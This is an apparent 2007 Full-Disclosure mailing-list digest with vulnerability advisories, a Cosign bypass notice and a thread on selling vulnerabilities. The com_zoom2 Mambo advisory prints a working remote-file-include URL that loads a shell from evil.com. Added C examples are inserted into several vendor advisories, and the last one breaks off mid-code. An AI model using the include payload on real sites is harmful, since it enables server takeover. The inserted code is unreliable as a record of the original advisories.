Re: [Full-disclosure] [++++SPAM++++] Fwd: threat to corporate security

2007-04-11 Thread Marco Ermini
On 4/10/07, n3td3v [EMAIL PROTECTED] wrote:
[...]
> Do not play with n3td3v's intelligence, we've already harvested
> mailboxes for Yahoo Inc, we've got internal operational data for Yahoo
> Inc. Employees are doing more than saying they are out of office or
> the dates they are coming back, they are openly talking about other
> stuff as well.

Of course I am not questioning the intelligence of anyone. Polite
people don't do such a thing. I don't know you so I can't judge you,
that's all :-) and if I have remarks on that, I don't make them in a
public mailing list. It would be simply lame.

Still, I found it quite strange that you use - in what seems to be a kind
of official communication - some of the worst English ever seen
(which doesn't testify to professionalism. Still, bear in mind, I am
not judging anyone...) or that you talk in pluralis majestatis like
you were the Queen :-)

Jokes apart, what I am questioning is whether you really have a clue
about such organisations, apart from always pointing your finger at Yahoo
- which must have done something to you, I guess :-) Are you a
disgruntled former employee? :-)


> We will release collect.txt if we need to prove the full scale of the issue.

I am not so interested personally :-)

> Look below for an example:
[...]

Ok, I trust you that Yahoo is sending their out-of-office replies out to the
world. Therefore I suggest you say "some corporations" or just
"Yahoo".


Cheers
-- 
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
http://www.markoer.org/ - https://www.linkedin.com/in/marcoermini

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [++++SPAM++++] Fwd: threat to corporate security

2007-04-11 Thread afed
On 4/10/07, n3td3v [EMAIL PROTECTED] wrote:

> We will release collect.txt if we need to prove the full scale of the issue.

Are you kidding?  This is full disclosure.



Re: [Full-disclosure] Hackers uniting against Iran?

2007-04-11 Thread Lubomir Kundrak
On Wed, 2007-04-04 at 15:56 -0500, United Hackers wrote:
> =
> Search for products and services at:
> http://search.mail.com

I searched, but found nothing particularly interesting. Did you mean
anything specific?

-- 
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?



[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

2007-04-11 Thread 0o_zeus_o0 elitemexico.org

com_zoom2 Mambo Module Remote File Include Vulnerability

##

author: 0o_zeus_o0
website: www.diosdelared.com
mail: [EMAIL PROTECTED]
10/04/07

##

/components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif?

include_once($mosConfig_absolute_path."/components/com_zoom/classes/iptc/EXIF.php");

site download:
http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip

###

[Full-disclosure] Application Layer Anti-virus/Firewall

2007-04-11 Thread pdp (architect)
http://www.gnucitizen.org/blog/application-layer-anti-virusfirewall

I wrote a small article on an application layer Anti-virus/Firewall
solution that I have in mind. I am not sure if that will be useful to
anyone but it is still an interesting thing to think about.

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



[Full-disclosure] Cosign SSO Authentication Bypass

2007-04-11 Thread Jon Oberheide
Author:  Jon Oberheide [EMAIL PROTECTED]
Date:Wed, April 11th, 2007


Summary
===

Application:  Cosign Single Sign-On
Affected Versions:2.0.1 and previous
Vendor Website:   http://weblogin.org
Type of Vulnerability:Authentication Bypass - Remote


Background
==

cosign is a web single-sign-on system.  Written at the University of
Michigan, cosign is an open source software project and a part of the
National Science Foundation Middleware Initiative (NMI) EDIT software
release.  cosign is deployed extensively at the University of Michigan
and at educational institutions and other organizations around the
world.


Description
===

Two critical remote vulnerabilities exist within the CGI component of
cosign allowing authentication bypass and impersonation of an arbitrary
user.  The full details of each vulnerability can be found at the
following links:

http://www.umich.edu/~umweb/software/cosign/cosign-vuln-2007-001.txt
http://www.umich.edu/~umweb/software/cosign/cosign-vuln-2007-002.txt


Resolution
==

Organizations utilizing cosign should upgrade to versions 1.9.4b or
2.0.2a available at http://weblogin.org.

-- 
Jon Oberheide [EMAIL PROTECTED]
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE



[Full-disclosure] Vulnerability Purchasing Program Questions

2007-04-11 Thread Steven Adair
Greetings,

I would like to see if I could get the community's take on these
vulnerability purchasing programs such as those offered by iDefense and
3COM.  There have been previous discussions that I have seen on the lists
surrounding poor monetary offerings of one program versus that of another.
I've also seen people come out and mention they are affiliated with some
program that will offer money for these vulnerabilities.  This has led me
to a few questions.

- Is there a general consensus as to what program is the best? I would
imagine this primarily centers on monetary offerings, but I suppose there
could be other considerations.

- If I normally work with vendors and disclose vulnerabilities for free,
why would I not use one of these programs?  I am making the assumption
that we are working with a legitimate and responsible buyer.  I have no
intentions to sell to shady buyers/foreign governments/etc and would like
to keep the assumption the buyer is legitimate.

- Do we know that the buyers are always legitimate and responsible?  Has
anyone ever suspected wrongdoing or felt they have been wronged by one of
the more popular and legitimate buying services?  For example, a
submission that was rejected by either party ended up being released by
the vendor anyway or integrated into their product.

- Any general comments on these sorts of programs that lean strongly
one way or the other?

Thanks,

Steven
securityzone.org



Re: [Full-disclosure] Vulnerability Purchasing Program Questions

2007-04-11 Thread Valdis . Kletnieks
On Wed, 11 Apr 2007 11:59:47 CDT, Steven Adair said:

> - Is there a general consensus as to what program is the best?

This is *highly* dependent on the definition of best.  Possible factors:

a) Amount of money paid
b) How white/black/grey hat the group is
c) How under the table they are willing to be - this could be important
if you want the bucks but *not* the fame and notoriety

Somebody might be willing to accept $10K from a white hat group, but
want $25K from a known black/dark grey hat group to cover the added risk
of being associated with them if the exploit is used for nefarious purposes,
but willing to settle for $20K if the exploit can't be traced back to them.



[Full-disclosure] [ MDKSA-2007:079-1 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities

2007-04-11 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2007:079-1
 http://www.mandriva.com/security/
 ___
 
 Package : xorg-x11
 Date: April 11, 2007
 Affected: 2007.1
 ___
 
 Problem Description:
 
 Local exploitation of a memory corruption vulnerability in the X.Org
 and XFree86 X server could allow an attacker to execute arbitrary
 code with privileges of the X server, typically root.
 
 The vulnerability exists in the ProcXCMiscGetXIDList() function in the
 XC-MISC extension. This request is used to determine what resource IDs
 are available for use. This function contains two vulnerabilities,
 both of which result in memory corruption of either the stack or heap. The
 ALLOCATE_LOCAL() macro used by this function allocates memory on the
 stack using alloca() on systems where alloca() is present, or using
 the heap otherwise. The handler function takes a user provided value,
 multiplies it, and then passes it to the above macro. This results in
 both an integer overflow vulnerability, and an alloca() stack pointer
 shifting vulnerability. Both can be exploited to execute arbitrary
 code. (CVE-2007-1003)
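The arithmetic behind the ProcXCMiscGetXIDList() issue, shown as an added C example that is not X.org code and not the vendor's patch: a 32-bit client-supplied count is multiplied by the element size to obtain the length of a scratch buffer. The `XID` typedef, the `MAX_SCRATCH_BYTES` cap and the `handle_get_xid_list()` handler are assumptions constructed for this example; the checked variant rejects both the wrapped product and a size large enough to drive a stack allocator past its bounds.

```c
/* Added example (not X.org code): how a request count becomes an
 * allocation size, and why both the overflow and an unbounded alloca()
 * matter. Names and limits below are constructed for the example. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

typedef uint32_t XID;   /* X resource IDs are 32-bit on the wire */

/* Upper bound accepted for a single scratch buffer. Constructed value for
 * this example; a real server chooses its own limit. */
#define MAX_SCRATCH_BYTES (64u * 1024u)

/* The unsafe arithmetic: the count arrives from the client as a 32-bit
 * value and is multiplied into a 32-bit size. For count >= 2^30 the product
 * wraps, so a huge request yields a tiny buffer while the handler still
 * loops `count` times writing into it. */
uint32_t xid_list_bytes_unchecked(uint32_t count)
{
    return count * (uint32_t)sizeof(XID);
}

/* Hardened form: reject a count whose product cannot be represented, and
 * independently cap the size so a stack allocator cannot be pushed
 * arbitrarily far past the guard page. Returns false on rejection. */
bool xid_list_bytes_checked(uint32_t count, size_t *out)
{
    if (count > UINT32_MAX / sizeof(XID))   /* product would overflow uint32_t */
        return false;
    size_t bytes = (size_t)count * sizeof(XID);
    if (bytes > MAX_SCRATCH_BYTES)          /* too large for scratch space */
        return false;
    *out = bytes;
    return true;
}

/* Simulated request handler: fills a scratch list of `count` IDs on the
 * heap (standing in for ALLOCATE_LOCAL) and returns how many were written,
 * or -1 if the request was refused. */
long handle_get_xid_list(uint32_t count)
{
    size_t bytes;
    if (!xid_list_bytes_checked(count, &bytes))
        return -1;
    XID *ids = malloc(bytes ? bytes : 1);
    if (!ids)
        return -1;
    for (uint32_t i = 0; i < count; i++)
        ids[i] = 0x00400000u + i;   /* constructed resource-ID base */
    free(ids);
    return (long)count;
}

int main(void)
{
    uint32_t huge = 0x40000001u;   /* 2^30 + 1: the 32-bit product wraps to 4 */
    printf("unchecked bytes for %u IDs: %u\n",
           (unsigned)huge, (unsigned)xid_list_bytes_unchecked(huge));
    printf("checked handler result for that count: %ld\n", handle_get_xid_list(huge));
    printf("checked handler result for 16 IDs: %ld\n", handle_get_xid_list(16));
    return 0;
}
```

The two checks are deliberately separate: the overflow test alone still admits a count of 2^30 - 1, which is a four-gigabyte request that no stack allocator should be asked to satisfy.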
 
 iDefense reported two integer overflows in the way X.org handled
 various font files. A malicious local user could exploit these issues
 to potentially execute arbitrary code with the privileges of the
 X.org server. (CVE-2007-1351, CVE-2007-1352)
 
 Multiple integer overflows in (1) the XGetPixel function in ImUtil.c
 in x.org libx11 before 1.0.3, and (2) XInitImage function in xwd.c for
 ImageMagick, allow user-assisted remote attackers to cause a denial
 of service (crash) or information leak via crafted images with large
 or negative values that trigger a buffer overflow. (CVE-2007-1667)
 
 Updated packages are patched to address these issues.

 Update:

 Packages for Mandriva Linux 2007.1 are now available.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1667
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.1:
 094834b9cec06d41814fcfbb4826a1b4  
2007.1/i586/libx11-common-1.1.1-2.1mdv2007.1.i586.rpm
 60ba6ee2def612bab83b056aa9143c28  
2007.1/i586/libx11_6-1.1.1-2.1mdv2007.1.i586.rpm
 83832a8b9a359f0199bf0b58024bcc93  
2007.1/i586/libx11_6-devel-1.1.1-2.1mdv2007.1.i586.rpm
 e7f0426150c15b701dca49a131d4f911  
2007.1/i586/libx11_6-static-devel-1.1.1-2.1mdv2007.1.i586.rpm
 4d737b55208b15a17076ea417fef6e83  
2007.1/i586/libxfont1-1.2.7-1.1mdv2007.1.i586.rpm
 28b347acb8851ef8cdc9b8b61ffb669b  
2007.1/i586/libxfont1-devel-1.2.7-1.1mdv2007.1.i586.rpm
 aa2e50b1ee6967c2ed3bb8c6dc64c84b  
2007.1/i586/libxfont1-static-devel-1.2.7-1.1mdv2007.1.i586.rpm
 530b51e76f6b9a0df342719a8b9ddb99  
2007.1/i586/x11-server-1.2.0-8.1mdv2007.1.i586.rpm
 9d717cb5fab234a4c76a4a0811bf4638  
2007.1/i586/x11-server-common-1.2.0-8.1mdv2007.1.i586.rpm
 5a47c5a19827c3e820b02c2db7796659  
2007.1/i586/x11-server-devel-1.2.0-8.1mdv2007.1.i586.rpm
 76a33d69862b1c457a2cec21a37b51d8  
2007.1/i586/x11-server-xati-1.2.0-8.1mdv2007.1.i586.rpm
 880f19417b5379635ddb6c5f2e612971  
2007.1/i586/x11-server-xchips-1.2.0-8.1mdv2007.1.i586.rpm
 dc8db2e2fa639a5e5590a9301590e58a  
2007.1/i586/x11-server-xdmx-1.2.0-8.1mdv2007.1.i586.rpm
 b71ce20ae5de448b2e54d6458df98526  
2007.1/i586/x11-server-xephyr-1.2.0-8.1mdv2007.1.i586.rpm
 fed1ade3cb4ca74c6362837618a5452c  
2007.1/i586/x11-server-xepson-1.2.0-8.1mdv2007.1.i586.rpm
 9e3f8d012b49126ee4b217dd24521f29  
2007.1/i586/x11-server-xfake-1.2.0-8.1mdv2007.1.i586.rpm
 15adb208aac159c1575a3ddd77ffbaee  
2007.1/i586/x11-server-xfbdev-1.2.0-8.1mdv2007.1.i586.rpm
 37b8f6fdbfca1dc9192758dabd9b5adc  
2007.1/i586/x11-server-xgl-0.0.1-0.20070105.4.1mdv2007.1.i586.rpm
 f8a04c4056025562b4e280a09c5c8577  
2007.1/i586/x11-server-xi810-1.2.0-8.1mdv2007.1.i586.rpm
 ce53fc038ab1f432b216d4057e53057d  
2007.1/i586/x11-server-xmach64-1.2.0-8.1mdv2007.1.i586.rpm
 a6fe363ba43b509661709a3c9245ba8c  
2007.1/i586/x11-server-xmga-1.2.0-8.1mdv2007.1.i586.rpm
 d95d4a1b0b7e9bdee00f7cf90e934a39  
2007.1/i586/x11-server-xneomagic-1.2.0-8.1mdv2007.1.i586.rpm
 7718f0eabcc0b212012ffb0e5c8e6a26  
2007.1/i586/x11-server-xnest-1.2.0-8.1mdv2007.1.i586.rpm
 5c06fbc05c7ea8abfdb4ecdeb2ce2d75  
2007.1/i586/x11-server-xnvidia-1.2.0-8.1mdv2007.1.i586.rpm
 aa416e9d9cc207be2c801c4570d43015  
2007.1/i586/x11-server-xorg-1.2.0-8.1mdv2007.1.i586.rpm
 9076d8da47cfa869a84896cd26722ecc  
2007.1/i586/x11-server-xpm2-1.2.0-8.1mdv2007.1.i586.rpm
 

[Full-disclosure] [ MDKSA-2007:082 ] - Updated madwifi-source, wpa_supplicant packages fix vulnerabilities

2007-04-11 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:082
 http://www.mandriva.com/security/
 ___
 
 Package : madwifi-source
 Date: April 11, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 The ath_rate_sample function in the ath_rate/sample/sample.c sample
 code in MadWifi before 0.9.3 allows remote attackers to cause a denial
 of service (failed KASSERT and system crash) by moving a connected
 system to a location with low signal strength, and possibly other
 vectors related to a race condition between interface enabling and
 packet transmission. (CVE-2005-4835)
 
 MadWifi, when Ad-Hoc mode is used, allows remote attackers to cause
 a denial of service (system crash) via unspecified vectors that lead
 to a kernel panic in the ieee80211_input function, related to packets
 coming from a malicious WinXP system. (CVE-2006-7177)
 
 MadWifi before 0.9.3 does not properly handle reception of an AUTH
 frame by an IBSS node, which allows remote attackers to cause a denial
 of service (system crash) via a certain AUTH frame. (CVE-2006-7178)
 
 ieee80211_input.c in MadWifi before 0.9.3 does not properly process
 Channel Switch Announcement Information Elements (CSA IEs), which
 allows remote attackers to cause a denial of service (loss of
 communication) via a Channel Switch Count less than or equal to one,
 triggering a channel change. (CVE-2006-7179)
 
 ieee80211_output.c in MadWifi before 0.9.3 sends unencrypted packets
 before WPA authentication succeeds, which allows remote attackers
 to obtain sensitive information (related to network structure),
 and possibly cause a denial of service (disrupted authentication)
 and conduct spoofing attacks. (CVE-2006-7180)
 
 Updated packages have been upgraded to 0.9.3 to correct these
 issues. wpa_supplicant is built using madwifi-source and has been
 rebuilt using the 0.9.3 source.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4835
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 d7cbe028e271f0f8d774905558e74fdc  
2007.0/i586/madwifi-source-0.9.3-1.1mdv2007.0.noarch.rpm
 904a90761313b1cc56d6a0ff0d477ad7  
2007.0/i586/wpa_gui-0.5.5-2.1mdv2007.0.i586.rpm
 052bfcc81003cc8b6656434e4611a521  
2007.0/i586/wpa_supplicant-0.5.5-2.1mdv2007.0.i586.rpm 
 aaec8f2686274bd944a2a0932180a91d  
2007.0/SRPMS/madwifi-source-0.9.3-1.1mdv2007.0.src.rpm
 8b9dad3443aab464e3f32bdf6e5e4ab6  
2007.0/SRPMS/wpa_supplicant-0.5.5-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 d7cbe028e271f0f8d774905558e74fdc  
2007.0/x86_64/madwifi-source-0.9.3-1.1mdv2007.0.noarch.rpm
 286aebce2515abdf2ce786d568ca561a  
2007.0/x86_64/wpa_gui-0.5.5-2.1mdv2007.0.x86_64.rpm
 b65aa19f1f3f3e54fe1417e01efa0618  
2007.0/x86_64/wpa_supplicant-0.5.5-2.1mdv2007.0.x86_64.rpm 
 aaec8f2686274bd944a2a0932180a91d  
2007.0/SRPMS/madwifi-source-0.9.3-1.1mdv2007.0.src.rpm
 8b9dad3443aab464e3f32bdf6e5e4ab6  
2007.0/SRPMS/wpa_supplicant-0.5.5-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 b1516928d8a7912697ed745a4c7d7e92  
2007.1/i586/madwifi-source-0.9.3-1.1mdv2007.1.noarch.rpm
 f8f1afbd019cee7198980cea27f51888  
2007.1/i586/wpa_gui-0.5.7-1.1mdv2007.1.i586.rpm
 1b6c006280fc9e489367a33277aedec2  
2007.1/i586/wpa_supplicant-0.5.7-1.1mdv2007.1.i586.rpm 
 5cfe8a50972bc71713aeec6e3fd16477  
2007.1/SRPMS/madwifi-source-0.9.3-1.1mdv2007.1.src.rpm
 39d7ca78f1476cf4cc1e9424b839687d  
2007.1/SRPMS/wpa_supplicant-0.5.7-1.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 b1516928d8a7912697ed745a4c7d7e92  
2007.1/x86_64/madwifi-source-0.9.3-1.1mdv2007.1.noarch.rpm
 f2d503a7c9c75a2e7a893bf9ac21b67d  
2007.1/x86_64/wpa_gui-0.5.7-1.1mdv2007.1.x86_64.rpm
 cab5de7a034f25e3a1135ebb4baf540a  
2007.1/x86_64/wpa_supplicant-0.5.7-1.1mdv2007.1.x86_64.rpm 
 5cfe8a50972bc71713aeec6e3fd16477  
2007.1/SRPMS/madwifi-source-0.9.3-1.1mdv2007.1.src.rpm
 39d7ca78f1476cf4cc1e9424b839687d  
2007.1/SRPMS/wpa_supplicant-0.5.7-1.1mdv2007.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update 

[Full-disclosure] [ MDKSA-2007:083 ] - Updated apache-mod_perl packages fix DoS vulnerability

2007-04-11 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:083
 http://www.mandriva.com/security/
 ___
 
 Package : apache-mod_perl
 Date: April 11, 2007
 Affected: 2006.0, 2007.0, 2007.1, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 PerlRun.pm in Apache mod_perl 1.30 and earlier, and RegistryCooker.pm
 in mod_perl 2.x, does not properly escape PATH_INFO before use in a
 regular expression, which allows remote attackers to cause a denial
 of service (resource consumption) via a crafted URI.
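The class of fix this issue calls for, quoting untrusted PATH_INFO before it is interpolated into a pattern, as an added example in C with POSIX regcomp()/regexec() rather than Perl. It is not mod_perl code; `regex_quote()` and `path_info_matches()` are names made up for the example, and the request values are constructed. It shows the mismatch and the compile failure that unquoted metacharacters produce, which is the same root cause as the resource exhaustion the advisory describes.

```c
/* Added example, not mod_perl code: quote untrusted text (here PATH_INFO)
 * before embedding it in a regular expression, using POSIX regcomp/regexec. */
#define _POSIX_C_SOURCE 200809L
#include <regex.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Escape every POSIX ERE metacharacter so the text matches only itself.
 * Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *regex_quote(const char *s)
{
    static const char meta[] = "\\^$.|?*+()[]{}";
    size_t n = strlen(s);
    char *out = malloc(2 * n + 1);
    if (!out)
        return NULL;
    size_t j = 0;
    for (size_t i = 0; i < n; i++) {
        if (strchr(meta, s[i]))
            out[j++] = '\\';
        out[j++] = s[i];
    }
    out[j] = '\0';
    return out;
}

/* Builds the anchored pattern "^<path_info>" the way a script-name check
 * might, and tests it against `uri`. With quote=false the request text is
 * interpreted as pattern syntax; with quote=true it is matched literally.
 * Returns 1 on match, 0 on no match, -1 if the pattern failed to compile. */
int path_info_matches(const char *path_info, const char *uri, bool quote)
{
    char *piece = quote ? regex_quote(path_info) : strdup(path_info);
    if (!piece)
        return -1;
    size_t len = strlen(piece) + 2;          /* '^' + piece + NUL */
    char *pat = malloc(len);
    if (!pat) {
        free(piece);
        return -1;
    }
    snprintf(pat, len, "^%s", piece);
    regex_t re;
    int rc = regcomp(&re, pat, REG_EXTENDED | REG_NOSUB);
    free(pat);
    free(piece);
    if (rc != 0)
        return -1;                            /* e.g. an unbalanced '[' from the client */
    int m = regexec(&re, uri, 0, NULL, 0);
    regfree(&re);
    return m == 0 ? 1 : 0;
}

int main(void)
{
    /* Constructed sample request values. */
    printf("unquoted '/a.b' vs '/aXb': %d\n", path_info_matches("/a.b", "/aXb", false));
    printf("quoted   '/a.b' vs '/aXb': %d\n", path_info_matches("/a.b", "/aXb", true));
    printf("unquoted '/a[' compiles?  %d\n", path_info_matches("/a[", "/a[", false));
    printf("quoted   '/a[' vs '/a[':  %d\n", path_info_matches("/a[", "/a[", true));
    return 0;
}
```

In Perl the same effect comes from `\Q...\E` or `quotemeta()`; whichever engine is in use, the untrusted string must reach the pattern as data, never as syntax.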
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1349
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 36fc6ebd1647bf1cd0d404f19342ad7e  
2006.0/i586/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.i586.rpm
 02dce36084140d70e829e47d960ea576  
2006.0/i586/apache-mod_perl-devel-2.0.54_2.0.1-6.1.20060mdk.i586.rpm 
 0b880a7578f7f0d4378f9e21204696c9  
2006.0/SRPMS/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 fa69d3b6658b440e244404c8a27dc31a  
2006.0/x86_64/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.x86_64.rpm
 e2cd324ddefb059d9e15c7cf29378dd6  
2006.0/x86_64/apache-mod_perl-devel-2.0.54_2.0.1-6.1.20060mdk.x86_64.rpm 
 0b880a7578f7f0d4378f9e21204696c9  
2006.0/SRPMS/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 a5144771fa71b818e2d89f8c417c5243  
2007.0/i586/apache-mod_perl-2.0.2-8.1mdv2007.0.i586.rpm
 a165f6820d6c1ffd2cfc671aa2a44310  
2007.0/i586/apache-mod_perl-devel-2.0.2-8.1mdv2007.0.i586.rpm 
 a3829703a55a306a1132d496e63ec652  
2007.0/SRPMS/apache-mod_perl-2.0.2-8.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 af928b60d4291c583bad0f4c04ca6169  
2007.0/x86_64/apache-mod_perl-2.0.2-8.1mdv2007.0.x86_64.rpm
 e54445500f5ca4a28a3a4bbb2223d792  
2007.0/x86_64/apache-mod_perl-devel-2.0.2-8.1mdv2007.0.x86_64.rpm 
 a3829703a55a306a1132d496e63ec652  
2007.0/SRPMS/apache-mod_perl-2.0.2-8.1mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 e52c43b0f7a66915e4c76aae38d3877b  
2007.1/i586/apache-mod_perl-2.0.3-3.1mdv2007.1.i586.rpm
 01fcca2beb3f2c79d9f4ac8aae13c631  
2007.1/i586/apache-mod_perl-devel-2.0.3-3.1mdv2007.1.i586.rpm 
 3d752f5e1d08baf118da6ce8407a4ee7  
2007.1/SRPMS/apache-mod_perl-2.0.3-3.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 e969fb39acb7ce53cf8528fbc6283a9d  
2007.1/x86_64/apache-mod_perl-2.0.3-3.1mdv2007.1.x86_64.rpm
 4d43ab40be1bd7b404866ae0af6e2663  
2007.1/x86_64/apache-mod_perl-devel-2.0.3-3.1mdv2007.1.x86_64.rpm 
 3d752f5e1d08baf118da6ce8407a4ee7  
2007.1/SRPMS/apache-mod_perl-2.0.3-3.1mdv2007.1.src.rpm

 Corporate 3.0:
 e5e446755e5b3b403e573ee356bd01be  
corporate/3.0/i586/HTML-Embperl-1.3.29_1.3.6-3.2.C30mdk.i586.rpm
 1399d977fdae6085bc59102b8577c052  
corporate/3.0/i586/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.i586.rpm
 c49b2f2564a381aa22dd02b9d4f7c607  
corporate/3.0/i586/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.i586.rpm
 f2534e8cd62267e0cfffb147323e816c  
corporate/3.0/i586/apache2-mod_perl-devel-2.0.48_1.99_11-3.1.C30mdk.i586.rpm
 cd85d71d94598d066a912b57ea8b1534  
corporate/3.0/i586/mod_perl-common-1.3.29_1.29-3.2.C30mdk.i586.rpm
 32700fd599acc6d2e012f00155586bc1  
corporate/3.0/i586/mod_perl-devel-1.3.29_1.29-3.2.C30mdk.i586.rpm 
 0ff32be9c7e314b93142b25c0ccfc3ff  
corporate/3.0/SRPMS/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.src.rpm
 672b33503464c59bdda5025f1004ab0b  
corporate/3.0/SRPMS/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 afc8e04510079792d9bf6a2c43dad3cf  
corporate/3.0/x86_64/HTML-Embperl-1.3.29_1.3.6-3.2.C30mdk.x86_64.rpm
 35977f84e3a1ce37e0f5a50814675c7a  
corporate/3.0/x86_64/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.x86_64.rpm
 a8c7bd9351bcc6c83b204646df7bffdd  
corporate/3.0/x86_64/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.x86_64.rpm
 397ad0e9ea70f6f0bcdae436b7dd4e53  
corporate/3.0/x86_64/apache2-mod_perl-devel-2.0.48_1.99_11-3.1.C30mdk.x86_64.rpm
 42c4e59c5174e84b7b7659de0f6d0b3e  
corporate/3.0/x86_64/mod_perl-common-1.3.29_1.29-3.2.C30mdk.x86_64.rpm
 7acc7a6c50b41a4c9900910a0c1b3ec0  
corporate/3.0/x86_64/mod_perl-devel-1.3.29_1.29-3.2.C30mdk.x86_64.rpm 
 0ff32be9c7e314b93142b25c0ccfc3ff  
corporate/3.0/SRPMS/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.src.rpm
 672b33503464c59bdda5025f1004ab0b  
corporate/3.0/SRPMS/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.src.rpm

 Corporate 4.0:
 c7dbc8d2b1f4a7959cc8ba28b229512c  
corporate/4.0/i586/apache-mod_perl-2.0.2-8.1.20060mlcs4.i586.rpm
 88e16a7e0755a3a1fe987f6f2c44336c  
corporate/4.0/i586/apache-mod_perl-devel-2.0.2-8.1.20060mlcs4.i586.rpm 
 

[Full-disclosure] iDefense Security Advisory 04.11.07: Apache HTTPD suEXEC Multiple Vulnerabilities

2007-04-11 Thread iDefense Labs
Apache HTTPD suEXEC Multiple Vulnerabilities

iDefense Security Advisory 04.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 11, 2007

I. BACKGROUND

The suexec binary is a helper application which is part of the Apache
HTTP server package. It is designed to allow a script to run with the
privileges of the owner of the script instead of the privileges of the
server. More information about the suexec utility can be found at the
following URL.

http://httpd.apache.org/docs/2.0/suexec.html

II. DESCRIPTION

Local exploitation of multiple vulnerabilities within Apache Software
Foundation's suexec utility could allow an attacker to execute
arbitrary code as another user.

1) Path Checking Race Condition Vulnerabilities

One race condition occurs between obtaining the current directory
and changing to that directory. Another race condition occurs between
changing to a directory and checking that the directory is not a link.
The directory structure may change between each of these operations,
which can lead to the lstat() being performed on an arbitrary directory
chosen by an attacker. These may be exploited by renaming a parent
directory, or by using symbolic links.

A third race condition occurs between the final symbolic link check and
executing the target binary. The directory structure may change between
these calls, rendering the symbolic link check ineffective.

2) Path Checking Design Error Vulnerabilities

The suexec utility uses a strncmp() to check whether the current
directory is a sub-directory of the document root directory. This check
will succeed in situations where there exists a directory which begins
with the same sequence, but contains extra content. For example, if the
document root is /var/www/html, the test will also succeed for
/var/www/html_backup and /var/www/htmleditor. A correct test would
also perform a check that the next character is a trailing
null-terminator or directory separator.

A check performed does not verify whether a path to the CGI script (cmd)
is a regular file or not. If the path is pointing at a sub-directory
owned by the appropriate user and group, and the parent directory is
owned by the appropriate user and group, it will be accepted.
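The two design errors in section 2, and the check-then-use gap from section 1, as an added C example that is not the suexec source: the bare prefix test beside the corrected one, and a target-file check done on an open descriptor instead of a path. The docroot and sample paths are constructed; `under_docroot()` and `open_regular_target()` are names made up for the example.

```c
/* Added example, not the suexec source: document-root containment and
 * target-file checks. The docroot and sample paths are constructed values. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The flawed test: a bare prefix comparison. "/var/www/html_backup" and
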